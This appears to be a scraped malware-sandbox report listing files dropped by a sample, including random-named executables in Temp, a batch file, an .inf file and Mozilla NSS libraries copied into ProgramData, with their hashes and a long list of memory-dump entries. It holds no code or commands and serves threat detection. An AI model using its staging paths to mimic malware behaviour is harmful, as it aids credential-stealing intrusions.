aee9b2a1bd1e7893424cf7ff466b840a72d19ac1114ad19297f29affa102c7a0

SHA512
7644c4798270135ccbd4bca3f7ba6e43a71c664b73a21c238938aaaccac04b966c737183a1ea24af93ee95c311e0eb008d8802c73fba72ef4fee217f7930becd

Download Submit
C:\Users\Admin\AppData\Local\Temp\UfJw3Bmhwg.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\UfJw3Bmhwg.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\UfJw3Bmhwg.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\dfgmhjHJdfgopi.exe
MD5
16e824fdf56f7245dc7f16515eb5f1cc

SHA1
5c3a677872bafabbee3a33ae8e649b53bbd47608

SHA256
8c88bfd2f874fc258892b8227b25ef7f192dc440746dc065eb45f77169435626

SHA512
ccb1fc18d3c7438b0448dbed2855bc9396dee3cded164296d836be15970c11b2cef646b692bd622b27b8b48da9418afa155bae9964079bfaa55313cac1a11c1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\dfgmhjHJdfgopi.exe
MD5
16e824fdf56f7245dc7f16515eb5f1cc

SHA1
5c3a677872bafabbee3a33ae8e649b53bbd47608

SHA256
8c88bfd2f874fc258892b8227b25ef7f192dc440746dc065eb45f77169435626

SHA512
ccb1fc18d3c7438b0448dbed2855bc9396dee3cded164296d836be15970c11b2cef646b692bd622b27b8b48da9418afa155bae9964079bfaa55313cac1a11c1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\dfgmhjHJdfgopi.exe
MD5
16e824fdf56f7245dc7f16515eb5f1cc

SHA1
5c3a677872bafabbee3a33ae8e649b53bbd47608

SHA256
8c88bfd2f874fc258892b8227b25ef7f192dc440746dc065eb45f77169435626

SHA512
ccb1fc18d3c7438b0448dbed2855bc9396dee3cded164296d836be15970c11b2cef646b692bd622b27b8b48da9418afa155bae9964079bfaa55313cac1a11c1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ec0gR61U3d.exe
MD5
0bef94ee2711756531916709dde75de8

SHA1
e989ee5a5149df2590e569a1e3231daadd8f7b81

SHA256
cc6e538004f2725145291a264b3f8d9835566c9950fcda9a11fc19d40fd44b26

SHA512
efd0d4610a811ddd1c71ecbb8ef2a9e4ae10f34f16ae9b2f0946570efdfe6807e8731486655ca9e083328fec73ba09c57fe939cc49982fe38ae5e8a9a01f5131

Download Submit
C:\Users\Admin\AppData\Local\Temp\ec0gR61U3d.exe
MD5
0bef94ee2711756531916709dde75de8

SHA1
e989ee5a5149df2590e569a1e3231daadd8f7b81

SHA256
cc6e538004f2725145291a264b3f8d9835566c9950fcda9a11fc19d40fd44b26

SHA512
efd0d4610a811ddd1c71ecbb8ef2a9e4ae10f34f16ae9b2f0946570efdfe6807e8731486655ca9e083328fec73ba09c57fe939cc49982fe38ae5e8a9a01f5131

Download Submit
C:\Users\Admin\AppData\Local\Temp\em888WYDwB.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\em888WYDwB.exe

Download Submit
C:\Users\Public\Natso.bat

Download Submit
C:\Windows\temp\sjjbrliw.inf

Download Submit
\ProgramData\mozglue.dll
MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
\ProgramData\nss3.dll
MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
\ProgramData\sqlite3.dll
MD5
e477a96c8f2b18d6b5c27bde49c990bf

SHA1
e980c9bf41330d1e5bd04556db4646a0210f7409

SHA256
16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

SHA512
335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
MD5
60acd24430204ad2dc7f148b8cfe9bdc

SHA1
989f377b9117d7cb21cbe92a4117f88f9c7693d9

SHA256
9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

SHA512
626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
MD5
eae9273f8cdcf9321c6c37c244773139

SHA1
8378e2a2f3635574c106eea8419b5eb00b8489b0

SHA256
a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc

SHA512
06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
MD5
02cc7b8ee30056d5912de54f1bdfc219

SHA1
a6923da95705fb81e368ae48f93d28522ef552fb

SHA256
1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

SHA512
0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
MD5
4e8df049f3459fa94ab6ad387f3561ac

SHA1
06ed392bc29ad9d5fc05ee254c2625fd65925114

SHA256
25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

SHA512
3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
MD5
4e8df049f3459fa94ab6ad387f3561ac

SHA1
06ed392bc29ad9d5fc05ee254c2625fd65925114

SHA256
25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

SHA512
3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5
f964811b68f9f1487c2b41e1aef576ce

SHA1
b423959793f14b1416bc3b7051bed58a1034025f

SHA256
83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

SHA512
565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

Download Submit
memory/788-15-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/788-13-0x000000000043FA93-mapping.dmp

Download
memory/788-12-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/840-18-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/840-16-0x0000000000417A8B-mapping.dmp

Download
memory/840-14-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/920-350-0x0000000000000000-mapping.dmp

Download
memory/1004-33-0x0000000000000000-mapping.dmp

Download
memory/1096-19-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/1096-20-0x000000000041A684-mapping.dmp

Download
memory/1096-22-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/1260-58-0x0000000000000000-mapping.dmp

Download
memory/1304-32-0x0000000000000000-mapping.dmp

Download
memory/1536-318-0x0000000050480000-0x000000005049A000-memory.dmp

Filesize
104KB

Download
memory/1536-76-0x0000000004320000-0x0000000004370000-memory.dmp

Filesize
320KB

Download
memory/1536-48-0x0000000000000000-mapping.dmp

Download
memory/1980-61-0x0000000005D20000-0x0000000005D21000-memory.dmp

Filesize
4KB

Download
memory/1980-44-0x0000000000000000-mapping.dmp

Download
memory/1980-64-0x0000000005820000-0x0000000005821000-memory.dmp

Filesize
4KB

Download
memory/1980-47-0x0000000071D20000-0x000000007240E000-memory.dmp

Filesize
6.9MB

Download
memory/1980-330-0x0000000002EB0000-0x0000000002EFD000-memory.dmp

Filesize
308KB

Download
memory/1980-352-0x0000000005B60000-0x0000000005B85000-memory.dmp

Filesize
148KB

Download
memory/1980-51-0x0000000000E40000-0x0000000000E41000-memory.dmp

Filesize
4KB

Download
memory/2404-63-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

Filesize
4KB

Download
memory/2404-53-0x0000000000000000-mapping.dmp

Download
memory/2404-56-0x0000000071D20000-0x000000007240E000-memory.dmp

Filesize
6.9MB

Download
memory/2404-70-0x0000000005710000-0x0000000005711000-memory.dmp

Filesize
4KB

Download
memory/2404-331-0x0000000002F10000-0x0000000002F49000-memory.dmp

Filesize
228KB

Download
memory/2556-2-0x0000000000000000-mapping.dmp

Download
memory/2716-273-0x0000000000000000-mapping.dmp

Download
memory/2716-233-0x0000000000000000-mapping.dmp

Download
memory/2716-87-0x0000000000000000-mapping.dmp

Download
memory/2716-89-0x0000000000000000-mapping.dmp

Download
memory/2716-91-0x0000000000000000-mapping.dmp

Download
memory/2716-93-0x0000000000000000-mapping.dmp

Download
memory/2716-95-0x0000000000000000-mapping.dmp

Download
memory/2716-97-0x0000000000000000-mapping.dmp

Download
memory/2716-99-0x0000000000000000-mapping.dmp

Download
memory/2716-101-0x0000000000000000-mapping.dmp

Download
memory/2716-103-0x0000000000000000-mapping.dmp

Download
memory/2716-105-0x0000000000000000-mapping.dmp

Download
memory/2716-107-0x0000000000000000-mapping.dmp

Download
memory/2716-109-0x0000000000000000-mapping.dmp

Download
memory/2716-111-0x0000000000000000-mapping.dmp

Download
memory/2716-113-0x0000000000000000-mapping.dmp

Download
memory/2716-115-0x0000000000000000-mapping.dmp

Download
memory/2716-117-0x0000000000000000-mapping.dmp

Download
memory/2716-119-0x0000000000000000-mapping.dmp

Download
memory/2716-121-0x0000000000000000-mapping.dmp

Download
memory/2716-123-0x0000000000000000-mapping.dmp

Download
memory/2716-125-0x0000000000000000-mapping.dmp

Download
memory/2716-127-0x0000000000000000-mapping.dmp

Download
memory/2716-129-0x0000000000000000-mapping.dmp

Download
memory/2716-131-0x0000000000000000-mapping.dmp

Download
memory/2716-133-0x0000000000000000-mapping.dmp

Download
memory/2716-135-0x0000000000000000-mapping.dmp

Download
memory/2716-137-0x0000000000000000-mapping.dmp

Download
memory/2716-139-0x0000000000000000-mapping.dmp

Download
memory/2716-141-0x0000000000000000-mapping.dmp

Download
memory/2716-143-0x0000000000000000-mapping.dmp

Download
memory/2716-145-0x0000000000000000-mapping.dmp

Download
memory/2716-147-0x0000000000000000-mapping.dmp

Download
memory/2716-149-0x0000000000000000-mapping.dmp

Download
memory/2716-151-0x0000000000000000-mapping.dmp

Download
memory/2716-153-0x0000000000000000-mapping.dmp

Download
memory/2716-155-0x0000000000000000-mapping.dmp

Download
memory/2716-157-0x0000000000000000-mapping.dmp

Download
memory/2716-159-0x0000000000000000-mapping.dmp

Download
memory/2716-161-0x0000000000000000-mapping.dmp

Download
memory/2716-163-0x0000000000000000-mapping.dmp

Download
memory/2716-165-0x0000000000000000-mapping.dmp

Download
memory/2716-167-0x0000000000000000-mapping.dmp

Download
memory/2716-169-0x0000000000000000-mapping.dmp

Download
memory/2716-171-0x0000000000000000-mapping.dmp

Download
memory/2716-173-0x0000000000000000-mapping.dmp

Download
memory/2716-175-0x0000000000000000-mapping.dmp

Download
memory/2716-177-0x0000000000000000-mapping.dmp

Download
memory/2716-179-0x0000000000000000-mapping.dmp

Download
memory/2716-181-0x0000000000000000-mapping.dmp

Download
memory/2716-183-0x0000000000000000-mapping.dmp

Download
memory/2716-185-0x0000000000000000-mapping.dmp

Download
memory/2716-187-0x0000000000000000-mapping.dmp

Download
memory/2716-189-0x0000000000000000-mapping.dmp

Download
memory/2716-191-0x0000000000000000-mapping.dmp

Download
memory/2716-193-0x0000000000000000-mapping.dmp

Download
memory/2716-195-0x0000000000000000-mapping.dmp

Download
memory/2716-197-0x0000000000000000-mapping.dmp

Download
memory/2716-199-0x0000000000000000-mapping.dmp

Download
memory/2716-201-0x0000000000000000-mapping.dmp

Download
memory/2716-203-0x0000000000000000-mapping.dmp

Download
memory/2716-205-0x0000000000000000-mapping.dmp

Download
memory/2716-207-0x0000000000000000-mapping.dmp

Download
memory/2716-209-0x0000000000000000-mapping.dmp

Download
memory/2716-211-0x0000000000000000-mapping.dmp

Download
memory/2716-213-0x0000000000000000-mapping.dmp

Download
memory/2716-215-0x0000000000000000-mapping.dmp

Download
memory/2716-217-0x0000000000000000-mapping.dmp

Download
memory/2716-219-0x0000000000000000-mapping.dmp

Download
memory/2716-221-0x0000000000000000-mapping.dmp

Download
memory/2716-223-0x0000000000000000-mapping.dmp

Download
memory/2716-225-0x0000000000000000-mapping.dmp

Download
memory/2716-227-0x0000000000000000-mapping.dmp

Download
memory/2716-229-0x0000000000000000-mapping.dmp

Download
memory/2716-231-0x0000000000000000-mapping.dmp

Download
memory/2716-85-0x0000000000000000-mapping.dmp

Download
memory/2716-235-0x0000000000000000-mapping.dmp

Download
memory/2716-237-0x0000000000000000-mapping.dmp

Download
memory/2716-239-0x0000000000000000-mapping.dmp

Download
memory/2716-241-0x0000000000000000-mapping.dmp

Download
memory/2716-243-0x0000000000000000-mapping.dmp

Download
memory/2716-245-0x0000000000000000-mapping.dmp

Download
memory/2716-247-0x0000000000000000-mapping.dmp

Download
memory/2716-249-0x0000000000000000-mapping.dmp

Download
memory/2716-251-0x0000000000000000-mapping.dmp

Download
memory/2716-253-0x0000000000000000-mapping.dmp

Download
memory/2716-255-0x0000000000000000-mapping.dmp

Download
memory/2716-257-0x0000000000000000-mapping.dmp

Download
memory/2716-259-0x0000000000000000-mapping.dmp

Download
memory/2716-261-0x0000000000000000-mapping.dmp

Download
memory/2716-263-0x0000000000000000-mapping.dmp

Download
memory/2716-265-0x0000000000000000-mapping.dmp

Download
memory/2716-267-0x0000000000000000-mapping.dmp

Download
memory/2716-269-0x0000000000000000-mapping.dmp

Download
memory/2716-271-0x0000000000000000-mapping.dmp

Download
memory/2716-83-0x0000000000000000-mapping.dmp

Download
memory/2716-275-0x0000000000000000-mapping.dmp

Download
memory/2716-277-0x0000000000000000-mapping.dmp

Download
memory/2716-279-0x0000000000000000-mapping.dmp

Download
memory/2716-281-0x0000000000000000-mapping.dmp

Download
memory/2716-283-0x0000000000000000-mapping.dmp

Download
memory/2716-285-0x0000000000000000-mapping.dmp

Download
memory/2716-287-0x0000000000000000-mapping.dmp

Download
memory/2716-289-0x0000000000000000-mapping.dmp

Download
memory/2716-291-0x0000000000000000-mapping.dmp

Download
memory/2716-293-0x0000000000000000-mapping.dmp

Download
memory/2716-295-0x0000000000000000-mapping.dmp

Download
memory/2716-297-0x0000000000000000-mapping.dmp

Download
memory/2716-299-0x0000000000000000-mapping.dmp

Download
memory/2716-301-0x0000000000000000-mapping.dmp

Download
memory/2716-303-0x0000000000000000-mapping.dmp

Download
memory/2716-305-0x0000000000000000-mapping.dmp

Download
memory/2716-307-0x0000000000000000-mapping.dmp

Download
memory/2716-309-0x0000000000000000-mapping.dmp

Download
memory/2716-311-0x0000000000000000-mapping.dmp

Download
memory/2716-313-0x0000000000000000-mapping.dmp

Download
memory/2716-315-0x0000000000000000-mapping.dmp

Download
memory/2716-81-0x0000000000000000-mapping.dmp

Download
memory/2716-317-0x0000000000000000-mapping.dmp

Download
memory/2716-319-0x0000000006650000-0x0000000006651000-memory.dmp

Filesize
4KB

Download
memory/2716-320-0x0000000000000000-mapping.dmp

Download
memory/2716-78-0x0000000000C70000-0x0000000000C71000-memory.dmp

Filesize
4KB

Download
memory/2716-80-0x0000000000D30000-0x0000000000D31000-memory.dmp

Filesize
4KB

Download
memory/2716-79-0x0000000000000000-mapping.dmp

Download
memory/3108-75-0x0000000000000000-mapping.dmp

Download
memory/3268-5-0x0000000000000000-mapping.dmp

Download
memory/3724-340-0x0000000000000000-mapping.dmp

Download
memory/3804-346-0x00000000011E0000-0x00000000011E3000-memory.dmp

Filesize
12KB

Download
memory/3804-67-0x00000000009F0000-0x00000000009F1000-memory.dmp

Filesize
4KB

Download
memory/3804-329-0x0000000001150000-0x0000000001189000-memory.dmp

Filesize
228KB

Download
memory/3804-62-0x0000000071D20000-0x000000007240E000-memory.dmp

Filesize
6.9MB

Download
memory/3804-57-0x0000000000000000-mapping.dmp

Download
memory/3844-344-0x0000000000000000-mapping.dmp

Download
memory/3844-353-0x0000000004FC0000-0x0000000004FC1000-memory.dmp

Filesize
4KB

Download
memory/4908-321-0x0000000000000000-mapping.dmp

Download
memory/4956-327-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/4956-325-0x000000000040DCB4-mapping.dmp

Download
memory/4956-323-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/4972-324-0x0000000000000000-mapping.dmp

Download
memory/5000-326-0x0000000000000000-mapping.dmp

Download
memory/5032-328-0x0000000000000000-mapping.dmp

Download
memory/5084-333-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/5084-337-0x0000000071D20000-0x000000007240E000-memory.dmp

Filesize
6.9MB

Download
memory/5084-334-0x000000000040616E-mapping.dmp

Download
memory/5092-345-0x0000000004BF0000-0x0000000004BF1000-memory.dmp

Filesize
4KB

Download
memory/5092-347-0x0000000007A70000-0x0000000007A71000-memory.dmp

Filesize
4KB

Download
memory/5092-342-0x0000000071D20000-0x000000007240E000-memory.dmp

Filesize
6.9MB

Download
memory/5092-332-0x0000000000000000-mapping.dmp

Download
memory/5092-354-0x0000000007540000-0x0000000007541000-memory.dmp

Filesize
4KB

Download